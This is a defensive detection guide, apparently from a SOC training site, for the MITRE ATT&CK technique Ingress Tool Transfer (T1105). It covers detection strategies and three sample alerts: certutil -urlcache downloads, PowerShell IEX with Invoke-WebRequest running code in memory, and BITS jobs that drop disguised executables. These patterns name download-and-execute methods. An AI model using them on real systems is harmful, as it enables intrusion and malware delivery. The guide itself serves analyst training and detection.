Ingress Tool Transfer (T1105) is a MITRE ATT&CK technique in the Command and Control tactic. SOC analysts detect it by monitoring for Firewall, XDR, SIEM events, behavioral anomalies, and the specific indicators described in this detection guide. Practice detection in SOCSimulator Operations.
Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary-controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (lateral tool transfer). On Windows, tools commonly used for ingress tool transfer include certutil, bitsadmin, PowerShell Invoke-WebRequest, and curl. On Linux, wget, curl, and custom download scripts are frequently used. Attackers stage their tooling and payloads on external infrastructure such as GitHub repositories, legitimate cloud storage services, and compromised websites to make retrieval appear legitimate and to evade reputation-based blocking.
“Ingress Tool Transfer is documented as technique T1105 in the MITRE ATT&CK knowledge base under the Command and Control tactic. Detection requires visibility into Firewall, XDR, SIEM telemetry.”
The following detection strategies help SOC analysts identify Ingress Tool Transfer activity. These methods apply across Firewall, XDR, SIEM environments and can be implemented as detection rules, correlation queries, or behavioral analytics in your security platform.
Monitor Windows built-in utilities being used for file download including certutil -urlcache, bitsadmin /transfer, mshta downloading from remote URLs, and regsvr32 pointing to remote scripts.
Alert on PowerShell Invoke-WebRequest, wget, and curl commands downloading content from external URLs, particularly when the destination file is saved to executable paths or subsequently executed.
Detect downloads from suspicious sources including newly registered domains, domains using dynamic DNS, free hosting services, and paste site URLs which are commonly used to host malware payloads.
Monitor network connections from unusual processes to external IP addresses, particularly when the connection results in a file being written to disk and then executed within a short time window.
Track file creation events on web servers and other internet-connected systems for executable files being written by web server processes, which may indicate web shell uploads or remote code execution.
These realistic alert examples show what Ingress Tool Transfer looks like in your security tools. Use them to tune detection rules and train analysts to recognize true positives versus false positives in live environments.
Certutil.exe executed with -urlcache -split -f parameters downloading a file named "update.cer" from 45.142.212.100. Despite the .cer extension, file analysis confirms the downloaded content is a PE executable. Certutil is commonly used as a living-off-the-land binary for malware download because it is trusted and available on all Windows systems, often whitelisted by application control policies.
PowerShell executed with IEX (Invoke-Expression) and Invoke-WebRequest downloading a script from raw.githubusercontent.com and executing it in memory without writing to disk. The GitHub account hosting the payload was created 2 hours before the download. The in-memory execution avoids file-based detection and the use of GitHub makes the connection appear legitimate to network controls.
BITS service created a background transfer job downloading content from an external URL to C:\Windows\Temp\svchost32.exe. BITS jobs persist across reboots and run as SYSTEM, making this technique effective for both tool transfer and persistence. The destination filename mimics a legitimate Windows process. The source URL resolves to a VPS hosting provider with no legitimate business relationship to the organization.
SOCSimulator provides hands-on training rooms where you investigate real-world attack scenarios including Ingress Tool Transfer. Build detection skills with zero consequences — free forever.
Command and Control (C2) refers to the infrastructure and communication channels adversaries use to remotely direct malw…
Read more GlossaryNetwork Detection and Response (NDR) is a security platform that passively monitors network traffic using machine learni…
Read more GlossaryAn Indicator of Compromise (IOC) is an observable artifact, such as a file hash, IP address, domain name, URL, registry …
Read more Career PathTier 2 SOC Analysts handle the investigations that Tier 1 escalates. You dig into multi-stage attacks, coordinate contai…
Read more Career PathThreat Hunters do not wait for alerts. You develop hypotheses based on threat intelligence and adversary behavior models…
Read more ToolThe Firewall console in SOCSimulator replicates the log analysis experience of enterprise platforms like Palo Alto Netwo…
Read more ToolThe XDR console in SOCSimulator replicates the investigation workflow of platforms like CrowdStrike Falcon, Microsoft De…
Read more ToolThe SIEM console in SOCSimulator replicates the workflow of enterprise platforms like Splunk Enterprise Security, Micros…
Read more ComparisonSOCSimulator wins on operational realism. You get multi-tool shift simulation with SLA pressure, noise injection, and al…
Read more ComparisonSOCSimulator is the better tool for dedicated SOC analyst preparation. TryHackMe is the better tool for broad cybersecur…
Read more PlaybookWhen network or endpoint detection tools alert on periodic HTTP/HTTPS beaconing, named pipe creation, or process injecti…
Read more PlaybookWhen network monitoring detects periodic outbound connections to suspicious external hosts, unusual DNS patterns, or tra…
Read moreWe use cookies to improve your experience and measure usage. Learn more